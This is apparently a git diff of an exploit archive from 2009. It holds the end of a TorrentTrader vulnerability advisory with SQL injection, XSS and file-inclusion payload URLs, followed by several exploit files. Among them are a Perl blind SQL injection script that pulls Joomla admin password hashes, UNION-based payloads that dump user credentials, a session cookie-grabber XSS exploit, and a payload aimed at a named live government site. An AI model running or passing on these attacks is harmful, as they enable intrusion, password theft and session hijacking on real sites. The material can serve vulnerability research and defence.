+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +TorrentTrader is a feature packed and highly customisable PHP/MySQL Based +BitTorrent tracker. Featuring integrated forums and plenty of administration +options. Please visit www.torrenttrader.org for the support forums. 
+ +http://sourceforge.net/projects/torrenttrader + + +List of found vulnerabilities +=============================================================================== + +1. Sql Injection vulnerability in "account-inbox.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "origmsg" is used in sql query +Preconditions: + 1. attacker must be logged in as valid user + +Test: + +http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes + +Result: "MYSQL Error has occurred!" + +-----------------------------[source code start]------------------------------- +if ($msg) { + $msg = trim($msg); + + $res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver).""); + $user = mysql_fetch_assoc($res); + if (!$user) + $message = "Username not found."; +... + + if ($origmsg && $delete == "yes") + mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr(); +-----------------------------[source code end]--------------------------------- + + +2. Weak password generation algorithm in "account-recover.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. generated password is weak and can be easily bruteforced +Preconditions: + 1. attacker must know email address associated with target's account + +Torrenttrader contains password reseting functionality: + +http://localhost/torrenttrader109/account-recover.php + +Anyone can initiate password reset, only condition is, that target's email +address must be know. Torrenttrader will check email address and after successful +validation new, temporal password will be generated and sent to that email address. +Specific autogenerated password appears to be random number between 10000 and 50000, +so basically there can be only 40000 possible temporal passwords. 
It's easy to +write bruteforce script, which will try all possible password combinations. +This process can take couple of hours or more, but eventually the password will +be guessed and target account becomes compromised. + +-----------------------------[source code start]------------------------------- +if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") { + $email = trim($_POST["email"]); + if (!validemail($email)) { + $msg = "" . NOT_VAILD_EMAIL . ""; + $kind = "Error"; + } + else { + $res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1"); + $arr = mysql_fetch_assoc($res); + + if (!$arr) { + $msg = "" . EMAIL_INVALID . ""; + $kind = "Error"; + } +... + if ($arr) { + $newpassword = rand(10000, 50000); + $md5pass = md5($newpassword); +-----------------------------[source code end]--------------------------------- + + +3. Unauthorized database backup vulnerability in "backup-database.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. missing access control +Preconditions: + 1. mysqldump utility must be available + 2. gzip utility must be available + 3. target directory must be writable + 4. database name must be known in order to successfully guess archive filename + +Test: + +http://localhost/torrenttrader109/backup-database.php + +Resulting message: "Database backup successful, entry inserted into database." + +-----------------------------[source code start]------------------------------- +system(sprintf( + 'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz', + $host, + $user, + $pass, + $db, + getenv('DOCUMENT_ROOT'), + $backupdir, + $db, + $day, + $month, + $year + )); +-----------------------------[source code end]--------------------------------- + +Attacker is able to create database backup and resulting "gz" archive's +filename can be guessed, if attacker knows database name. This file is also +directly downloadable from website. 
Example download URI: + +http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz + +As result information leakage exists. For example, attacker can fetch admin +credentials from backed up database. + + +4. Sql Injection vulnerability in "browse.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. uninitialized variable "wherecatin" is used in sql query +Preconditions: + 1. none + +Test: + +http://localhost/torrenttrader109/browse.php?wherecatin=waraxe + +Result: + +Unknown column 'waraxe' in 'where clause' + +-----------------------------[source code start]------------------------------- +if (count($wherecatina) > 1) +$wherecatin = implode(",",$wherecatina); +elseif (count($wherecatina) == 1) +$wherea[] = "category = $wherecatina[0]"; +... +if ($wherecatin) +$where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")"; + +if ($where != "") +$where = "WHERE $where"; + +$res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error()); +-----------------------------[source code end]--------------------------------- + +This specific sql injection vulneraility can be exploited using blind attack +methods. If there is one or more active torrents in database, then usable is +attack pattern below: + +http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1 + +and we see found torrents. + +http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1 + +"No torrents were found based on your search criteria." + +In this way attacker is able to ask boolean questions from database and retrieve +needed information bit by bit - example of classical blind sql injection. + +If there is no active torrents in database, then induced sql errors method can be used. 
+ +http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1 + +"Subquery returns more than 1 row" + +http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1 + +"No torrents were found based on your search criteria." + + +5. Information leakage in "check.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. missing access control +Preconditions: + 1. none + +Test: + +http://localhost/torrenttrader109/check.php + +This script is originally meant to be used by installer and lately by admins. +Because of lacking access control attacker is able to use it for gathering some +useful information about target system - full path to webroot, file and directory +permissions of specific files, couple of php settings. + +6. Sql Injection vulnerability in "delreq.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "categ" is used in sql query +Preconditions: + 1. attacker must have at least super moderator privileges (user class > 3) +Comments: + 1. very easy to exploit + +Test: + +http://localhost/torrenttrader109/delreq.php?categ=waraxe + +Result: + +You have an error in your SQL syntax; check the manual that corresponds to your +MySQL server version for the right syntax to use near +'waraxe order by requests.request LIMIT 0,50' at line 1 + +Test 2: + +http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+ + +and we can see all usernames, password hashes and emails from database. + + +7. Sql Injection vulnerability in "index.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "choice" is used in sql query +Preconditions: + 1. 
attacker must be logged in as valid user + 2. there must exist at least one poll + +Testing needs custom written html form: +------------------------------------------------------------------------------- +
    +
    + + +
    +------------------------------------------------------------------------------- + +Result: "MYSQL Error has occurred!" + +-----------------------------[source code start]------------------------------- +if ($_SERVER["REQUEST_METHOD"] == "POST") +{ + $choice = $_POST["choice"]; + if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice)) + { + $res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr(); + $arr = mysql_fetch_assoc($res) or die("No poll"); + $pollid = $arr["id"]; + $userid = $CURUSER["id"]; + $res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr(); + $arr = mysql_fetch_assoc($res); + if ($arr) die("Dupe vote"); + mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr(); +-----------------------------[source code end]--------------------------------- + + +8. Sql Injection vulnerability in "modrules.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "id" is used in sql query +Preconditions: + 1. attacker must have at least moderator privileges + +Testing needs custom written html form: +------------------------------------------------------------------------------- +
    +
    + + + + + + +
    +------------------------------------------------------------------------------- + +Test result: "MYSQL Error has occurred!" + +-----------------------------[source code start]------------------------------- +elseif ($_GET["act"]=="edited"){ +$id = $_POST["id"]; +$title = sqlesc($_POST["title"]); +$text = sqlesc($_POST["text"]); +$public = sqlesc($_POST["public"]); +$class = sqlesc($_POST["class"]); +mysql_query("update rules set title=$title, text=$text, public=$public, + class=$class where id=$id") or sqlerr(__FILE__,__LINE__); +-----------------------------[source code end]--------------------------------- + + +9. Information leakage in "phpinfo.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. missing access control +Preconditions: + 1. none + +Test: + +http://localhost/torrenttrader109/phpinfo.php + +-----------------------------[source code start]------------------------------- + +-----------------------------[source code end]--------------------------------- + +This script can be used by attacker to obtain information from php function +phpinfo(). Access to such script must be limited to admins, but currently there +is not any access control at all. + + +10. Sql Injection vulnerabilities in "report.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "user" is used in sql query + 2. unsanitized user submitted parameter "torrent" is used in sql query + 3. unsanitized user submitted parameter "forumid" is used in sql query + 4. unsanitized user submitted parameter "forumpost" is used in sql query +Preconditions: + 1. attacker must be logged in as valid user + +Two proof-of-concept tests below are using parameter "user". + +Test 1 needs custom written html form: +------------------------------------------------------------------------------- +
    +
    + + + +
    +------------------------------------------------------------------------------- + +Test result: "MYSQL Error has occurred!" + +Test 2 needs custom written html form: +-----------------------------[source code start]------------------------------- +
    +
    + + + +
    +-----------------------------[source code end]--------------------------------- + +Test result: "You have already reported user ..." + +It's classical blind sql injection exploitation method and allows attacker to +fetch information from database bit by bit by asking boolean questions. + +Other three sql injection vulnerabilities in "report.php" involve user submitted +parameters "torrent", "forumid" and "forumpost" and exploitation can be done in +similar way as seen above. + + +11. Sql Injection vulnerability in "take-deletepm.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "delmp" is used in sql query +Preconditions: + 1. attacker must have admin privileges + +-----------------------------[source code start]------------------------------- +if(isset($_POST["delmp"])) { + $do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")"; + $res=mysql_query($do) +-----------------------------[source code end]--------------------------------- + + +12. Sql Injection vulnerability in "takedelreport.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "delreport" is used in sql query +Preconditions: + 1. attacker must have at least moderator privileges + +-----------------------------[source code start]------------------------------- +jmodonly(); + +$res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0 + AND id IN (" . implode(", ", $_POST[delreport]) . ")"); +-----------------------------[source code end]--------------------------------- + + +13. Sql Injection vulnerability in "takedelreq.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "delreq" is used in sql query +Preconditions: + 1. 
attacker must be logged in as valid user + +-----------------------------[source code start]------------------------------- +if (get_user_class() > UC_JMODERATOR){ +... +$do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")"; +$do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")"; +$res2=mysql_query($do2); +$res=mysql_query($do); +... +} else { +foreach ($_POST[delreq] as $del_req){ +$delete_ok = checkRequestOwnership($CURUSER[id],$del_req); +if ($delete_ok){ +$do="DELETE FROM requests WHERE id IN ($del_req)"; +$do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)"; +... +function checkRequestOwnership ($user, $delete_req){ +$query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr(); +-----------------------------[source code end]--------------------------------- + + + +14. Sql Injection vulnerability in "takestaffmess.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "clases" is used in sql query +Preconditions: + 1. attacker must have admin privileges + +-----------------------------[source code start]------------------------------- +adminonly(); +... +$updateset = $_POST['clases']; + +$query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")"); +-----------------------------[source code end]--------------------------------- + + +15. Sql Injection vulnerability in "takewarndisable.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameter "warndisable" is used in sql query +Preconditions: + 1. attacker must have at least moderator privileges + +-----------------------------[source code start]------------------------------- +jmodonly(); +... +if ($disable != '') { +$do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . 
")"; +$res=mysql_query($do); +} + +if ($enable != '') { +$do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")"; +$res = mysql_query($do); +} +-----------------------------[source code end]--------------------------------- + + +16. Sql Injection vulnerability in "today.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. uninitialized variable "limit" is used in sql query +Preconditions: + 1. none +Comments: + 1. seems hard to exploit + +Test: + +http://localhost/torrenttrader109/today.php?limit=waraxe + +Result: + +"Warning: mysql_num_rows(): supplied argument is not a valid MySQL result +resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21" + + +17. Sql Injection vulnerability in "torrents-details.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. uninitialized variable "where" is used in sql query +Preconditions: + 1. none + +-----------------------------[source code start]------------------------------- +//speed mod +$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents +WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15") +or sqlerr(__FILE__, __LINE__); +-----------------------------[source code end]--------------------------------- + +Exploitation is possible using blind sql injection methods. + +Test 1: + +http://localhost/torrenttrader109/torrents-details.php?id=1& +where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+ + +Result: normal page + +Test 2: + +http://localhost/torrenttrader109/torrents-details.php?id=1& +where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+ + +Result: "MYSQL Error has occurred!" + + +18. Sql Injection vulnerability in "admin-delreq.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. uninitialized variable "categ" is used in sql query +Preconditions: + 1. 
attacker must have at least moderator privileges + +-----------------------------[source code start]------------------------------- +jmodonly(); +... +$res=mysql_query("SELECT users.username, requests.filled, requests.filledby, +requests.id, requests.userid, requests.request, requests.added, categories.name +as cat FROM requests inner join categories on requests.cat = categories.id +inner join users on requests.userid = users.id +$categ order by requests.request $limit") or print(mysql_error()); +-----------------------------[source code end]--------------------------------- + +Test: + +http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe + +Result: "You have an error in your SQL syntax; check the manual that corresponds +to your MySQL server version for the right syntax to use +near 'waraxe order by requests.request LIMIT 0,50' at line 1" + + +19. Persistent XSS in "viewrequests.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameters used in response html generation +Preconditions: + 1. attacker must be logged in as valid user + +Steps for testing: + +a) attacker submits request: + +http://localhost/torrenttrader109/requests.php + +In "Title" field let's insert some javascript: + +testtitle + +b) admin will browse requests: + +http://localhost/torrenttrader109/viewrequests.php + +and previously planted javascript will be executed in admin session context. + + + +20. Persistent XSS in logging funtionality +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. unsanitized user submitted parameters used in response html generation +Preconditions: + 1. 
attacker must be logged in as valid user + +Steps for testing: + +a) attacker uploads torrent file: + +http://localhost/torrenttrader109/torrents-upload.php + +In "Torrent Name" field let's insert some javascript: + +testname + +Upload is successful: "The torrent has been uploaded successfully!" + +b) admin will browse logs: + +http://localhost/torrenttrader109/admin.php?act=view_log + +and previously planted javascript will be executed in admin session context. + + +21. Local File Inclusion vulnerability in "backend/admin-functions.php" +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Reasons: + 1. URI case-insensitivity on Windows platform +Preconditions: + 1. Windows platform + 2. register_globals=on + 3. magic_quotes_gpc=off + +-----------------------------[source code start]------------------------------- +if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die; +require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php"); +-----------------------------[source code end]--------------------------------- + +As we can see from source code snippet above, direct access to script is blocked. +In case of Windows and Apache combination URI handling is case-insensitive. +In other hand "strpos()" function, used for access control, is case-sensitive. +So this script can be directly executed, if we change some characters in script's +filename to uppercase: + +http://localhost/torrenttrader109/backend/Admin-functions.php + +"Warning: require_once(./themes//block.php) [function.require-once]: +failed to open stream: No such file or directory in +C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3" + +If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible: + +http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00 + + +22. 
Reflected XSS in multiple scripts +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Examples: + +http://localhost/torrenttrader109/themes/default/footer.php?ttversion= +http://localhost/torrenttrader109/themes/default/header.php?SITENAME="> +http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]= +http://localhost/torrenttrader109/visitorstoday.php?todayactive= +http://localhost/torrenttrader109/visitorsnow.php?activepeople= +http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1 +http://localhost/torrenttrader109/torrents-details.php?id=1&keepget="> + + +Greetings: +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke, +to all active waraxe.us forum members and to anyone else who know me! + + +Contact: +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +come2waraxe@yahoo.com +Janek Vind "waraxe" + +Waraxe forum: http://www.waraxe.us/forums.html +Personal homepage: http://www.janekvind.com/ +---------------------------------- [ EOF ] ------------------------------------ + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8959.pl b/platforms/php/webapps/8959.pl index bdc09e9c4..1f2e4b587 100755 --- a/platforms/php/webapps/8959.pl +++ b/platforms/php/webapps/8959.pl 
@@ -1,87 +1,87 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; -if(!$ARGV[1]) -{ - print " \n"; - print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; - print " o Joomla Component com_ijoomla_rss Blind SQL Injection Exploit o\n"; - print " o Author:xoron o\n"; - print " o More info:http://joomla15.ijoomlademo.com o\n"; - print " o vendor:http://ijoomlademo.com o\n"; - print " o Dork : com_ijoomla_rss o\n"; - print " o Usage: perl bachir.pl host path o\n"; - print " o Example: perl bachir.pl www.host.com /joomla/ -s 2 o\n"; - print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; - exit; -} -my $host = $ARGV[0]; -my $path = $ARGV[1]; -my $userid = 1; -my $sid = $ARGV[2]; -my %options = (); -GetOptions(\%options, "u=i", "s=i"); -print "[~] Exploiting...\n"; -if($options{"u"}) -{ - $userid = $options{"u"}; -} -if($options{"s"}) -{ - $sid = $options{"s"}; -} -syswrite(STDOUT, "[~] MD5-Hash: ", 14); -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $path, $userid, $sid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $path, $userid, $sid, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} -print "\n[~] Exploiting done\n"; -sub istrue2 -{ - my $host = shift; - my $path = shift; - my $uid = shift; - my $sid = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." 
and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")"; - my $resp = $ua->get($query); - my $content = $resp->content; - my $regexp = "seminar_boxA"; - - if($content =~ /$regexp/) - { - return 1; - } - else - { - return 0; - } -} - -# milw0rm.com [2009-06-15] +#!/usr/bin/perl +use LWP::UserAgent; +use Getopt::Long; +if(!$ARGV[1]) +{ + print " \n"; + print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; + print " o Joomla Component com_ijoomla_rss Blind SQL Injection Exploit o\n"; + print " o Author:xoron o\n"; + print " o More info:http://joomla15.ijoomlademo.com o\n"; + print " o vendor:http://ijoomlademo.com o\n"; + print " o Dork : com_ijoomla_rss o\n"; + print " o Usage: perl bachir.pl host path o\n"; + print " o Example: perl bachir.pl www.host.com /joomla/ -s 2 o\n"; + print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; + exit; +} +my $host = $ARGV[0]; +my $path = $ARGV[1]; +my $userid = 1; +my $sid = $ARGV[2]; +my %options = (); +GetOptions(\%options, "u=i", "s=i"); +print "[~] Exploiting...\n"; +if($options{"u"}) +{ + $userid = $options{"u"}; +} +if($options{"s"}) +{ + $sid = $options{"s"}; +} +syswrite(STDOUT, "[~] MD5-Hash: ", 14); +for(my $i = 1; $i <= 32; $i++) +{ + my $f = 0; + my $h = 48; + while(!$f && $h <= 57) + { + if(istrue2($host, $path, $userid, $sid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + if(!$f) + { + $h = 97; + while(!$f && $h <= 122) + { + if(istrue2($host, $path, $userid, $sid, $i, $h)) + { + $f = 1; + syswrite(STDOUT, chr($h), 1); + } + $h++; + } + } +} +print "\n[~] Exploiting done\n"; +sub istrue2 +{ + my $host = shift; + my $path = shift; + my $uid = shift; + my $sid = shift; + my $i = shift; + my $h = shift; + + my $ua = LWP::UserAgent->new; + my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." 
and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")"; + my $resp = $ua->get($query); + my $content = $resp->content; + my $regexp = "seminar_boxA"; + + if($content =~ /$regexp/) + { + return 1; + } + else + { + return 0; + } +} + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8961.txt b/platforms/php/webapps/8961.txt index 17af2d683..152fe0e69 100755 --- a/platforms/php/webapps/8961.txt +++ b/platforms/php/webapps/8961.txt @@ -1,21 +1,21 @@ -Wordpress Photoracer Plugin => SQL injection -http://wordpress.org/extend/plugins/photoracer/ - -Author: Kacper -Website: http://devilteam.pl/ - -Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, - -Pozdro: Ratman, Kopaczka, FDJ - -Elo: dla GLOBUSa za pomoc w crackowaniu hasel. - -Vuln: - -http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8-- - -big thanks str0ke for you! - -be safe all :) - -# milw0rm.com [2009-06-15] +Wordpress Photoracer Plugin => SQL injection +http://wordpress.org/extend/plugins/photoracer/ + +Author: Kacper +Website: http://devilteam.pl/ + +Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, + +Pozdro: Ratman, Kopaczka, FDJ + +Elo: dla GLOBUSa za pomoc w crackowaniu hasel. + +Vuln: + +http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8-- + +big thanks str0ke for you! + +be safe all :) + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8962.txt b/platforms/php/webapps/8962.txt index bec129470..01c806542 100755 --- a/platforms/php/webapps/8962.txt +++ b/platforms/php/webapps/8962.txt 
@@ -1,15 +1,15 @@ -################################################################################################################# -[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability -[+] Discovered By SirGod -[+] www.mortal-team.org -################################################################################################################# - -[+] Script homepage : http://phpcollegeex.sourceforge.net/ - -[+] SQL Injection - - http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users-- - -################################################################################################################# - -# milw0rm.com [2009-06-15] +################################################################################################################# +[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability +[+] Discovered By SirGod +[+] www.mortal-team.org +################################################################################################################# + +[+] Script homepage : http://phpcollegeex.sourceforge.net/ + +[+] SQL Injection + + http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users-- + +################################################################################################################# + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8967.txt b/platforms/php/webapps/8967.txt index 341e98d6f..8569d7021 100755 --- a/platforms/php/webapps/8967.txt +++ b/platforms/php/webapps/8967.txt 
@@ -1,41 +1,41 @@ -################################################################################################################# -[+] The Recipe Script version 5 Cookie Grabber Exploit -[+] Discovered By ThE g0bL!N -[+] Greetz : All my friends-Sec-r1z.com ( A good site if you want to learn :) ) -[+] Vendor:http://recipescript.com/ -[+] Dork"script by RECIPE SCRIPT" -################################################################################################################# -PoC --- -[+] Make 2 files and upload to your host : -[+]cookie.php - > Put in this File That Code: - -[+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php - -[+]Exploit: - ------- - 1)First Register in the site In Fisrt Name: Put That code - 2) - 3)Then After Complete Registration Go to add_recipe.php To add recipe - 4)Add a normal Recipe - 5) The Victim Open page of recipes recipes.php - 6)The js code Worked -Example -------- -Result: ------- - PHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03 - Then we put that code - javascript:document.cookie="PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/"; - After That you see : - ThE g0bL!N - Profile - Log off -################################################################################################################ - -# milw0rm.com [2009-06-15] +################################################################################################################# +[+] The Recipe Script version 5 Cookie Grabber Exploit +[+] Discovered By ThE g0bL!N +[+] Greetz : All my friends-Sec-r1z.com ( A good site if you want to learn :) ) +[+] Vendor:http://recipescript.com/ +[+] Dork"script by RECIPE SCRIPT" +################################################################################################################# +PoC +-- +[+] Make 2 files and upload to your host : +[+]cookie.php - > Put in this File That Code: + +[+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php + +[+]Exploit: + ------- + 1)First Register 
in the site In Fisrt Name: Put That code + 2) + 3)Then After Complete Registration Go to add_recipe.php To add recipe + 4)Add a normal Recipe + 5) The Victim Open page of recipes recipes.php + 6)The js code Worked +Example +------- +Result: +------ + PHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03 + Then we put that code + javascript:document.cookie="PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/"; + After That you see : + ThE g0bL!N + Profile + Log off +################################################################################################################ + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8968.txt b/platforms/php/webapps/8968.txt index bd2125dc2..4f70ae36d 100755 --- a/platforms/php/webapps/8968.txt +++ b/platforms/php/webapps/8968.txt 
@@ -1,109 +1,109 @@ ------------------------------------------------------------------------------- -Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability ------------------------------------------------------------------------------- - - - ##################################################### - # [+] Author : Chip D3 Bi0s # - # [+] Email : chipdebios[alt+64]gmail.com # - # [+] Vulnerability : Blind SQL injection # - ##################################################### - - - -Example: -http://localHost/path/index.php?option=com_jumi&fileid=n - -n=number fileid valid - -: -'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* -'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* -/index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* -etc, etc... - -DEMO LIVE: -http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/* - -etc, etc.... - 